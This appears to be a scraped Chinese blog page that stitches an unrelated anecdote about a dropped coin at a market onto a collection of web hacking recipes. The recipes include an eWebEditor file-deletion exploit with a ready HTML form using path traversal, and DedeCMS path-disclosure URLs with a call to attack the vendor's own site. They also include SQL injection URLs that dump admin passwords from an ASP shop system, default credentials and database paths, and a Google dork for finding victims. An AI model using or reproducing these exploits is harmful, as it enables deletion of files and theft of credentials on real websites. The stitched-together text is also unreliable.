话说…从来不买菜的我。今天终于在母亲的狂轰乱炸下帮母亲去菜市场买1次菜。事情就是这样开始的。

在我走的时候因为身上没有零钱。问了我亲爱的妈妈要了2.5元钱去菜市场买1元豆腐和一个茄子。当我匆忙的直接走进

卖豆腐的摊位时候买1元豆腐的时候从兜里掉下在地上了5毛钱。说起来也奇怪我旁边刚好有以为穿着阔气的阿姨刚买完。准备走人。我掉地上的5毛偏偏掉到那位阿姨的脚下。麻痹就在我拣钱的时候阿姨说哪个钱是她掉了。说她刚刚在这里掏钱。还问我我的钱什么掉在她的脚下。我直接吐血了。。。卖豆腐都看到是我掉的。哪个臭不要脸居然说是她掉了。我听到这话只说了句：这钱是我掉的。拿了钱和豆腐不在理哪个不要脸的老女人。然后转身走准备去买茄子。老女人就在身后发话了说：不说了不说了。 操了。搞的老子真的拣了她的钱一样。直接让我着实的郁闷了一天。。。现在这个社会啊。居然还有这么不要脸的人啊！要不是我还准备在买茄子没零钱，貌似我平时掉了5毛钱都不带拣的。。。。哎。。。算我倒霉把~~

这个漏洞可以很鸡肋，也可以很致命，关键看你怎么利用！

此漏洞存在于Example\NewsSystem目录下的delete.asp文件中，这是ewebeditor的测试页面，无须登陆可以直接进入，看这些代码：

而aSavePathFileName是前面从数据库取出来的：

看看D_SavePathFileName是怎么添加到数据库里的，在addsave.asp(modifysave.asp)里：

居然过滤了，是GetSafeStr函数，再看看这个函数，在Startup.asp里：

无语，这不是过滤字符型注入的函数么？放这里什么用也没有啊！既然路径没有过滤，那就可以直接定义了，构造一个提交页面，其中d_savepathfilename自己任意赋值(要删除多个文件，用|隔开即可)。试试../../eWebEditor.asp，提交后删除该新闻，于是主目录下的eWebEditor.asp不见了！

下面给出利用的htm：

1. <HTML><HEAD><TITLE>eWebEditor删除文件 by:oldjun([url]http://www.oldjun.com[/url])</TITLE>
2. <style>body,p,td,input {font-size:9pt}</style>
3. </HEAD><BODY><a href=’list.asp’>新闻列表</a> | <a href=’add.asp’>增加新闻</a>
4. <b>增加新闻</b>
5. <form action=”http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
6. method=”post” name=”myform”>
7.     <input type=hidden name=d_originalfilename>
8.     <input type=hidden name=d_savefilename>
9.     <table cellspacing=3 align=center>
10. <tr><td>要删的文件(相对路径就可以了)：</td>
11. <td><input type=”text” name=”d_savepathfilename” value=”" size=”90″></td>
12. </tr>
13. <tr><td>新闻标题(随便填)：</td>
14. <td><input type=”text” name=”d_title” value=”" size=”90″></td>
15. </tr>
16. <tr><td>标题图片：</td>
17. <td><select name=”d_picture” size=1><option value=”>无</option></select>
18. 当编辑区有插入图片时，将自动填充此下拉框</td>
19. </tr>
20. <tr><td>新闻内容(随便填)：</td>
21. <td><textarea name=”d_content”></textarea></td>
22. </tr>
23. </table>
24. <input type=submit name=btnSubmit value=” 提 交 “>
25. <input type=reset name=btnReset value=” 重 填 “>
26. </form>
27. </BODY></HTML>

在网站后面加上plus/task/dede-upcache.php
就能暴出网站路径但是没什么利用价值。
plus/paycenter/nps/config_pay_nps.php
plus/task/dede-optimize-table.php
plus/task/dede-maketimehtml.php

官方也存在这样的漏洞速度去暴暴

裸奔的系统。
1.shopmore.asp

set rs=server.createobject(“adodb.recordset”)
exec=”select * from [shop] where ssfl=”& request.QueryString(“id”) &” order by id desc ”
rs.open exec,conn,1,1
if rs.eof then
response.Write ” 该分类暂无产品！”
else
rs.PageSize =20 ‘每页记录条数
iCount=rs.RecordCount ‘记录总数
iPageSize=rs.PageSize
maxpage=rs.PageCount
page=request(“page”)
if Not IsNumeric(page) or page=”" then
page=1
2.about.asp

exec=”select * from [about] where id=”& request.QueryString(“id”)
set rs=server.createobject(“adodb.recordset”)
rs.open exec,conn,1,1

3.search_news.asp

dim title
title=request.form(“form_news”)
set rs=conn.execute(“select * from [news] where title like ‘%”&title&”%’”)
if title=”" then
response.write (“<script language=”"javascript”">alert(“”请输入关键字！”");history.go(-1);</script>”)
end if
if rs.eof then
response.write (“<script language=”"javascript”">alert(“”没有搜索到相关内容！”");history.go(-1);</script>”)

还有其他的页面。

4.此系统的在线编辑登录页面为admin/eWebEditor/admin/login.asp
默认user:admin password:198625
不能进的还可以试试

后台默认密码为admin11 86779533 abc123这三个

试试数据库默认地址为/data/%23sze7xiaohu.mdb

exp：http://www.xx.com/about.a … 0union%20select%201,admin,3,password,5,6%20from%20admin

http://www.xx.com/ShopMor … 0union%20select%201,2,admin%2bpassword,4,5,6,7,8,9%20from%20admin

搜索型注入：%’ and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where ‘%’=’

Google:inurl:ShopMore.asp?id